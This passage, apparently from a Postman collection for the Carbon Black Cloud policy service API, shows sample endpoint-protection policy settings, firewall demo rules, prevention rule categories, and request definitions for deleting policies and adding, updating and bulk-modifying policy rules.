\"sensor_settings\": [\n        {\n            \"name\": \"ALLOW_UNINSTALL\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"SHOW_UI\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"ENABLE_THREAT_SHARING\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"QUARANTINE_DEVICE\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"LOGGING_LEVEL\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"QUARANTINE_DEVICE_MESSAGE\",\n            \"value\": \"Your device has been quarantined. Please contact your administrator.\"\n        },\n        {\n            \"name\": \"SET_SENSOR_MODE\",\n            \"value\": \"0\"\n        },\n        {\n            \"name\": \"SENSOR_RESET\",\n            \"value\": \"0\"\n        },\n        {\n            \"name\": \"BACKGROUND_SCAN\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"POLICY_ACTION_OVERRIDE\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"HELP_MESSAGE\",\n            \"value\": \"\"\n        },\n        {\n            \"name\": \"PRESERVE_SYSTEM_MEMORY_SCAN\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"HASH_MD5\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"SCAN_LARGE_FILE_READ\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"SCAN_EXECUTE_ON_NETWORK_DRIVE\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"DELAY_EXECUTE\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"SCAN_NETWORK_DRIVE\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"BYPASS_AFTER_LOGIN_MINS\",\n            \"value\": \"0\"\n        },\n        {\n            \"name\": \"BYPASS_AFTER_RESTART_MINS\",\n            \"value\": \"0\"\n        },\n        {\n            \"name\": \"SHOW_FULL_UI\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"SECURITY_CENTER_OPT\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"CB_LIVE_RESPONSE\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"ALLOW_INLINE_BLOCKING\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"UNINSTALL_CODE\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"DEFENSE_OPT_OUT\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"UBS_OPT_IN\",\n            \"value\": \"false\"\n        }\n    ],\n    \"rapid_configs\": [\n        {\n            \"id\": \"1c03d653-eca4-4adc-81a1-04b17b6cbffc\",\n            \"name\": \"Event Reporting and Sensor Operation Exclusions\",\n            \"description\": \"Allows customers to exclude specific processes and process events from reporting to CBC\",\n            \"inherited_from\": \"psc:region\",\n            \"parameters\": {}\n        },\n        {\n            \"id\": \"df181779-f623-415d-879e-91c40246535d\",\n            \"name\": \"Host Based Firewall\",\n            \"description\": \"These are the Host based Firewall Rules which will be executed by the sensor. The Definition will be part of Main Policies.\",\n            \"inherited_from\": \"\",\n            \"parameters\": {\n                \"rule_groups\": [\n                    {\n                        \"description\": \"Description of Demo Rule Group\",\n                        \"name\": \"Demo Rule Group\",\n                        \"rules\": [\n                            {\n                                \"action\": \"ALLOW\",\n                                \"application_path\": \"C:\\\\sdk\\\\example\\\\allow\\\\rule\\\\path\",\n                                \"direction\": \"IN\",\n                                \"enabled\": false,\n                                \"local_ip_address\": \"11.12.13.14\",\n                                \"local_port_ranges\": \"1313\",\n                                \"name\": \"SDK Example Rule\",\n                                \"network_profile\": [\n                                    \"DOMAIN\"\n                                ],\n                                \"protocol\": \"TCP\",\n                                \"remote_ip_address\": \"15.16.17.18\",\n                                \"remote_port_ranges\": \"2121\",\n                                \"rule_access_check_guid\": \"2087536a-ed1e-41d7-814e-31d45111005d\",\n                                \"rule_inbound_event_check_guid\": \"edee18f0-b003-47d1-a844-04835ab75d41\",\n                                \"rule_outbound_event_check_guid\": \"6a647fd4-2502-494f-a911-087efac8714f\",\n                                \"test_mode\": false\n                            }\n                        ],\n                        \"ruleset_id\": \"7235fcbd-1c3a-4ace-b350-6b079a1e7d2a\"\n                    },\n                    {\n                        \"description\": \"another example\",\n                        \"name\": \"rule_group_202306230_01\",\n                        \"rules\": [\n                            {\n                                \"action\": \"ALLOW\",\n                                \"application_path\": \"C:\\\\sdk\\\\example\\\\allow\\\\rule\\\\path\",\n                                \"direction\": \"IN\",\n                                \"enabled\": false,\n                                \"local_ip_address\": \"11.12.13.14\",\n                                \"local_port_ranges\": \"1313\",\n                                \"name\": \"test01 rule\",\n                                \"network_profile\": [\n                                    \"PUBLIC\"\n                                ],\n                                \"protocol\": \"TCP\",\n                                \"remote_ip_address\": \"15.16.17.18\",\n                                \"remote_port_ranges\": \"2121\",\n                                \"rule_access_check_guid\": \"570df6bf-a755-438b-8206-d082595e9ab3\",\n                                \"rule_inbound_event_check_guid\": \"68d43538-48b2-43d6-9916-2ebfad421b86\",\n                                \"rule_outbound_event_check_guid\": \"ddef2bca-3c32-4298-ad2d-5452606f1c41\",\n                                \"test_mode\": false\n                            }\n                        ],\n                        \"ruleset_id\": \"87ddb873-124f-4e9d-93d9-d0fea0d2c967\"\n                    }\n                ],\n                \"default_rule\": {\n                    \"action\": \"ALLOW\",\n                    \"default_rule_access_check_guid\": \"0f4d11c5-cfb2-405d-9482-24ddf813dd02\",\n                    \"default_rule_inbound_event_check_guid\": \"76d0d19f-b499-4c23-a9cb-79583fad154b\",\n                    \"default_rule_outbound_event_check_guid\": \"d7b42c09-7819-4f6b-a5ab-2a99e0a5c26b\"\n                },\n                \"enable_host_based_firewall\": false\n            }\n        },\n        {\n            \"id\": \"1f8a5e4b-34f2-4d31-9f8f-87c56facaec8\",\n            \"name\": \"Advanced Scripting Prevention\",\n            \"description\": \"Addresses malicious fileless and file-backed scripts that leverage native programs and common scripting languages.\",\n            \"inherited_from\": \"psc:region\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"REPORT\"\n            }\n        },\n        {\n            \"id\": \"c4ed61b3-d5aa-41a9-814f-0f277451532b\",\n            \"name\": \"Carbon Black Threat Intel\",\n            \"description\": \"Addresses common and pervasive TTPs used for malicious activity as well as living off the land TTPs/behaviors detected by Carbon Black’s Threat Analysis Unit.\",\n            \"inherited_from\": \"psc:region\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"REPORT\"\n            }\n        },\n        {\n            \"id\": \"8a16234c-9848-473a-a803-f0f0ffaf5f29\",\n            \"name\": \"Persistence\",\n            \"description\": \"Addresses common TTPs/behaviors that threat actors use to retain access to systems across restarts, changed credentials, and other interruptions that could cut off their access.\",\n            \"inherited_from\": \"psc:region\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"BLOCK\"\n            }\n        },\n        {\n            \"id\": \"91c919da-fb90-4e63-9eac-506255b0a0d0\",\n            \"name\": \"Authentication Events\",\n            \"description\": \"Authentication Events\",\n            \"inherited_from\": \"\",\n            \"parameters\": {\n                \"enable_auth_events\": false\n            }\n        },\n        {\n            \"id\": \"1664f2e6-645f-4d6e-98ec-0c80485cbe0f\",\n            \"name\": \"Event Reporting Exclusions\",\n            \"description\": \"Allows customers to exclude specific processes from reporting events to CBC\",\n            \"inherited_from\": \"psc:region\",\n            \"parameters\": {}\n        },\n        {\n            \"id\": \"491dd777-5a76-4f58-88bf-d29926d12778\",\n            \"name\": \"Prevalent Module Exclusions\",\n            \"description\": \"Tune collection of events from prevalent modules\",\n            \"inherited_from\": \"psc:region\",\n            \"parameters\": {\n                \"enable_prevalent_module_event_collection\": false\n            }\n        },\n        {\n            \"id\": \"ac67fa14-f6be-4df9-93f2-6de0dbd96061\",\n            \"name\": \"Credential Theft\",\n            \"description\": \"Addresses threat actors obtaining credentials and relies on detecting the malicious use of TTPs/behaviors that indicate such activity.\",\n            \"inherited_from\": \"psc:region\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"REPORT\"\n            }\n        },\n        {\n            \"id\": \"88b19232-7ebb-48ef-a198-2a75a282de5d\",\n            \"name\": \"Privilege Escalation\",\n            \"description\": \"Addresses behaviors that indicate a threat actor has gained elevated access via a bug or misconfiguration within an operating system, and leverages the detection of TTPs/behaviors to prevent such activity.\",\n            \"inherited_from\": \"psc:region\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"REPORT\"\n            }\n        },\n        {\n            \"id\": \"97a03cc2-5796-4864-b16d-790d06bea20d\",\n            \"name\": \"Defense Evasion\",\n            \"description\": \"Addresses common TTPs/behaviors that threat actors use to avoid detection such as uninstalling or disabling security software, obfuscating or encrypting data/scripts and abusing trusted processes to hide and disguise their malicious activity.\",\n            \"inherited_from\": \"psc:region\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"REPORT\"\n            }\n        }\n    ],\n    \"rule_configs\": [\n        {\n            \"id\": \"1c03d653-eca4-4adc-81a1-04b17b6cbffc\",\n            \"name\": \"Event Reporting and Sensor Operation Exclusions\",\n            \"description\": \"Allows customers to exclude specific processes and process events from reporting to CBC\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"bypass\",\n            \"parameters\": {}\n        },\n        {\n            \"id\": \"df181779-f623-415d-879e-91c40246535d\",\n            \"name\": \"Host Based Firewall\",\n            \"description\": \"These are the Host based Firewall Rules which will be executed by the sensor. The Definition will be part of Main Policies.\",\n            \"inherited_from\": \"\",\n            \"category\": \"host_based_firewall\",\n            \"parameters\": {\n                \"rule_groups\": [\n                    {\n                        \"description\": \"Description of Demo Rule Group\",\n                        \"name\": \"Demo Rule Group\",\n                        \"rules\": [\n                            {\n                                \"action\": \"ALLOW\",\n                                \"application_path\": \"C:\\\\sdk\\\\example\\\\allow\\\\rule\\\\path\",\n                                \"direction\": \"IN\",\n                                \"enabled\": false,\n                                \"local_ip_address\": \"11.12.13.14\",\n                                \"local_port_ranges\": \"1313\",\n                                \"name\": \"SDK Example Rule\",\n                                \"network_profile\": [\n                                    \"DOMAIN\"\n                                ],\n                                \"protocol\": \"TCP\",\n                                \"remote_ip_address\": \"15.16.17.18\",\n                                \"remote_port_ranges\": \"2121\",\n                                \"rule_access_check_guid\": \"2087536a-ed1e-41d7-814e-31d45111005d\",\n                                \"rule_inbound_event_check_guid\": \"edee18f0-b003-47d1-a844-04835ab75d41\",\n                                \"rule_outbound_event_check_guid\": \"6a647fd4-2502-494f-a911-087efac8714f\",\n                                \"test_mode\": false\n                            }\n                        ],\n                        \"ruleset_id\": \"7235fcbd-1c3a-4ace-b350-6b079a1e7d2a\"\n                    },\n                    {\n                        \"description\": \"testing bug with saving is fixed\",\n                        \"name\": \"rule_group_202306230_01\",\n                        \"rules\": [\n                            {\n                                \"action\": \"ALLOW\",\n                                \"application_path\": \"C:\\\\sdk\\\\example\\\\allow\\\\rule\\\\path\",\n                                \"direction\": \"IN\",\n                                \"enabled\": false,\n                                \"local_ip_address\": \"11.12.13.14\",\n                                \"local_port_ranges\": \"1313\",\n                                \"name\": \"test01 rule\",\n                                \"network_profile\": [\n                                    \"PUBLIC\"\n                                ],\n                                \"protocol\": \"TCP\",\n                                \"remote_ip_address\": \"15.16.17.18\",\n                                \"remote_port_ranges\": \"2121\",\n                                \"rule_access_check_guid\": \"570df6bf-a755-438b-8206-d082595e9ab3\",\n                                \"rule_inbound_event_check_guid\": \"68d43538-48b2-43d6-9916-2ebfad421b86\",\n                                \"rule_outbound_event_check_guid\": \"ddef2bca-3c32-4298-ad2d-5452606f1c41\",\n                                \"test_mode\": false\n                            }\n                        ],\n                        \"ruleset_id\": \"87ddb873-124f-4e9d-93d9-d0fea0d2c967\"\n                    }\n                ],\n                \"default_rule\": {\n                    \"action\": \"ALLOW\",\n                    \"default_rule_access_check_guid\": \"0f4d11c5-cfb2-405d-9482-24ddf813dd02\",\n                    \"default_rule_inbound_event_check_guid\": \"76d0d19f-b499-4c23-a9cb-79583fad154b\",\n                    \"default_rule_outbound_event_check_guid\": \"d7b42c09-7819-4f6b-a5ab-2a99e0a5c26b\"\n                },\n                \"enable_host_based_firewall\": false\n            }\n        },\n        {\n            \"id\": \"1f8a5e4b-34f2-4d31-9f8f-87c56facaec8\",\n            \"name\": \"Advanced Scripting Prevention\",\n            \"description\": \"Addresses malicious fileless and file-backed scripts that leverage native programs and common scripting languages.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"core_prevention\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"REPORT\"\n            }\n        },\n        {\n            \"id\": \"c4ed61b3-d5aa-41a9-814f-0f277451532b\",\n            \"name\": \"Carbon Black Threat Intel\",\n            \"description\": \"Addresses common and pervasive TTPs used for malicious activity as well as living off the land TTPs/behaviors detected by Carbon Black’s Threat Analysis Unit.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"core_prevention\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"REPORT\"\n            }\n        },\n        {\n            \"id\": \"8a16234c-9848-473a-a803-f0f0ffaf5f29\",\n            \"name\": \"Persistence\",\n            \"description\": \"Addresses common TTPs/behaviors that threat actors use to retain access to systems across restarts, changed credentials, and other interruptions that could cut off their access.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"core_prevention\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"BLOCK\"\n            }\n        },\n        {\n            \"id\": \"91c919da-fb90-4e63-9eac-506255b0a0d0\",\n            \"name\": \"Authentication Events\",\n            \"description\": \"Authentication Events\",\n            \"inherited_from\": \"\",\n            \"category\": \"data_collection\",\n            \"parameters\": {\n                \"enable_auth_events\": false\n            }\n        },\n        {\n            \"id\": \"1664f2e6-645f-4d6e-98ec-0c80485cbe0f\",\n            \"name\": \"Event Reporting Exclusions\",\n            \"description\": \"Allows customers to exclude specific processes from reporting events to CBC\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"bypass\",\n            \"parameters\": {}\n        },\n        {\n            \"id\": \"491dd777-5a76-4f58-88bf-d29926d12778\",\n            \"name\": \"Prevalent Module Exclusions\",\n            \"description\": \"Tune collection of events from prevalent modules\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"data_collection\",\n            \"parameters\": {\n                \"enable_prevalent_module_event_collection\": false\n            }\n        },\n        {\n            \"id\": \"ac67fa14-f6be-4df9-93f2-6de0dbd96061\",\n            \"name\": \"Credential Theft\",\n            \"description\": \"Addresses threat actors obtaining credentials and relies on detecting the malicious use of TTPs/behaviors that indicate such activity.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"core_prevention\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"REPORT\"\n            }\n        },\n        {\n            \"id\": \"88b19232-7ebb-48ef-a198-2a75a282de5d\",\n            \"name\": \"Privilege Escalation\",\n            \"description\": \"Addresses behaviors that indicate a threat actor has gained elevated access via a bug or misconfiguration within an operating system, and leverages the detection of TTPs/behaviors to prevent such activity.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"core_prevention\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"REPORT\"\n            }\n        },\n        {\n            \"id\": \"97a03cc2-5796-4864-b16d-790d06bea20d\",\n            \"name\": \"Defense Evasion\",\n            \"description\": \"Addresses common TTPs/behaviors that threat actors use to avoid detection such as uninstalling or disabling security software, obfuscating or encrypting data/scripts and abusing trusted processes to hide and disguise their malicious activity.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"core_prevention\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"REPORT\"\n            }\n        }\n    ],\n    \"sensor_configs\": []\n}"}],"_postman_id":"baf18a46-1e15-480f-a6ff-9b888a9a0e66"},{"name":"Delete Policy","id":"24d0dba4-2b71-4dba-a91a-1b791e9f31ca","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"warning":"This is a duplicate header and will be overridden by the X-Auth-Token header generated by Postman.","key":"X-Auth-Token","value":"Custom API Secret Key/Custom API ID","type":"text"}],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}","description":"<p>Delete an existing policy.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"24d0dba4-2b71-4dba-a91a-1b791e9f31ca"}],"id":"046bfd1f-0b30-4227-86fc-0aa0520a0ef3","description":"<p>Create, get, update or delete complete policies.</p>\n","_postman_id":"046bfd1f-0b30-4227-86fc-0aa0520a0ef3","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Policy Rules Management","item":[{"name":"Add Policy Rule","id":"402629cf-2607-4690-a3ac-64c11645e439","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"required\": <boolean>,\n    \"action\": \"<string>\",\n    \"application\": {\n        \"type\": \"<string>\",\n        \"value\": \"<string>\"\n    },\n    \"operation\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rules","description":"<p>Create a new permission or prevention rule in a policy</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","rules"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"e27af8f3-50fd-4083-8bac-685c715271a3","name":"Add Policy Rule","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"required\": false,\n    \"action\": \"TERMINATE\",\n    \"application\": {\n        \"type\": \"REPUTATION\",\n        \"value\": \"SUSPECT_MALWARE\"\n    },\n    \"operation\": \"RUN\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rules"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"id\": 3,\n    \"required\": false,\n    \"action\": \"TERMINATE\",\n    \"application\": {\n        \"type\": \"REPUTATION\",\n        \"value\": \"SUSPECT_MALWARE\"\n    },\n    \"operation\": \"RUN\"\n}"}],"_postman_id":"402629cf-2607-4690-a3ac-64c11645e439"},{"name":"Update Policy Rule","id":"0b53670e-6830-463b-a3ac-0992157b66e9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n    \"id\": <long>,\n    \"required\": <boolean>,\n    \"action\": \"<string>\",\n    \"application\": {\n        \"type\": \"<string>\",\n        \"value\": \"<string>\"\n    },\n    \"operation\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rules/{{cb_rule_id}}","description":"<p>Update an existing permission or prevention rule in a policy.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","rules","{{cb_rule_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"0b53670e-6830-463b-a3ac-0992157b66e9"},{"name":"Delete Policy Rule","id":"f4e765fe-9af1-4f61-a725-624957b417e7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rules/{{cb_rule_id}}","description":"<p>Delete an existing permission or prevention rule in a policy.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","rules","{{cb_rule_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"f4e765fe-9af1-4f61-a725-624957b417e7"},{"name":"Bulk Modify Policy Rules","id":"05a54125-2798-42a6-88e2-c9c2c2ec4e27","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"target_policy_ids\": [\n    <long>\n    ],\n    \"conflict_resolution_mode\": \"<string>\",\n    \"changes\": [\n        {\n            \"old_rule\": {\n                \"required\": <boolean>,\n                \"action\": \"<string>\",\n                \"application\": {\n                    \"type\": \"<string>\",\n                    \"value\": \"<string>\"\n                },\n                \"operation\": \"<string>\"\n            },\n            \"new_rule\": {\n                \"required\": <boolean>,\n                \"action\": \"<string>\",\n                \"application\": {\n                    \"type\": \"<string>\",\n                    \"value\": \"<string>\"\n                },\n                \"operation\": \"<string>\"\n            }\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/rules/changes","description":"<p>Copy or modify a permission or prevention rule into multiple policies.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","rules","changes"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"39def191-c355-497c-8a77-5aeef5af34c0","name":"Bulk Modify Policy Rules","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"target_policy_ids\": [\n        6527\n    ],\n    \"conflict_resolution_mode\": \"TAKE_NEW\",\n    \"changes\": [\n        {\n            \"new_rule\": {\n                \"required\": true,\n                \"action\": \"TERMINATE\",\n                \"application\": {\n                    \"type\": \"REPUTATION\",\n                    \"value\": \"KNOWN_MALWARE\"\n                },\n                \"operation\": \"RUN\"\n            }\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/rules/changes"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"target_policy_ids\": [\n        6527\n    ],\n    \"conflict_resolution_mode\": \"TAKE_NEW\",\n    \"changes\": [\n        {\n            \"new_rule\": {\n                \"id\": 0,\n                \"required\": true,\n                \"action\": \"TERMINATE\",\n                \"application\": {\n                    \"type\": \"REPUTATION\",\n                    \"value\": \"KNOWN_MALWARE\"\n                },\n                \"operation\": \"RUN\"\n            },\n            \"policy_id\": 6527,\n            \"state\": \"APPLIED\",\n            \"resolution\": \"TAKE_NEW\"\n        }\n    ],\n    \"failed_policy_ids\": [],\n    \"num_applied\": 1,\n    \"num_conflicts\": 0,\n    \"success\": true\n}"}],"_postman_id":"05a54125-2798-42a6-88e2-c9c2c2ec4e27"}],"id":"38b218ec-acca-4fdc-b99c-59e0ce768620","description":"<p>Add, Update or Delete rules within a policy.</p>\n","_postman_id":"38b218ec-acca-4fdc-b99c-59e0ce768620","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Rule Configs","item":[{"name":"Presentation","id":"8ecf4785-88fb-491a-9053-76d26cd7b91b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/configs/presentation","description":"<p>List all the supported rule configs and their parameters and presentation.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","configs","presentation"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"66f3fca2-dde1-41dc-8c2f-f44e96499631","name":"Presentation","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/configs/presentation"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"configs\": [\n        {\n            \"id\": \"ac67fa14-f6be-4df9-93f2-6de0dbd96061\",\n            \"name\": \"Credential Theft\",\n            \"description\": \"Addresses threat actors obtaining credentials and relies on detecting the malicious use of TTPs/behaviors that indicate such activity.\",\n            \"presentation\": {\n                \"name\": \"cred_theft.name\",\n                \"category\": \"core-prevention\",\n                \"description\": [\n                    \"cred_theft.description\"\n                ],\n                \"platforms\": 